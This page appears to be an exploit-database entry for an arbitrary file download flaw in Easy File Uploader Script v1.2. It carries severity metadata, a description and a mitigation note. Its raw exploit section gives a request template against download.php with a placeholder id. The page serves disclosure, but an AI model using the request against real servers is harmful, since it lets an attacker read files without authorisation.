header-logo
Suggest Exploit
vendor:
Easy File Uploader Script
by:
Ihsan Sencan
8,8
CVSS
HIGH
Arbitrary File Download
434
CWE
Product Name: Easy File Uploader Script
Affected Version From: 1.2
Affected Version To: 1.2
Patch Exists: NO
Related CWE: N/A
CPE: a:nelliwinne:easy_file_uploader_script:1.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Win7 x64, Kali Linux x64
2017

Easy File Uploader Script v1.2 – Arbitrary File Download

A vulnerability in Easy File Uploader Script v1.2 allows an attacker to download arbitrary files from the server. This is due to the download.php script not properly validating the id parameter, allowing an attacker to download any file from the server.

Mitigation:

Validate the id parameter in the download.php script to ensure that only authorized files can be downloaded.
Source

Exploit-DB raw data:

# # # # # 
# Exploit Title: Easy File Uploader Script v1.2 - Arbitrary File Download
# Google Dork: N/A
# Date: 07.02.2017
# Vendor Homepage: http://nelliwinne.net/
# Software Buy: https://codecanyon.net/item/easy-file-uploader-php-multiple-uploader-with-file-manager/17222287
# Demo: http://demos.nelliwinne.net/EasyFileUploader/
# Version: 1.2
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# Exploit :
# http://localhost/[PATH]/download.php?id=[FILE]
# # # # #

Navigation

Suggest Exploit

Services By CQR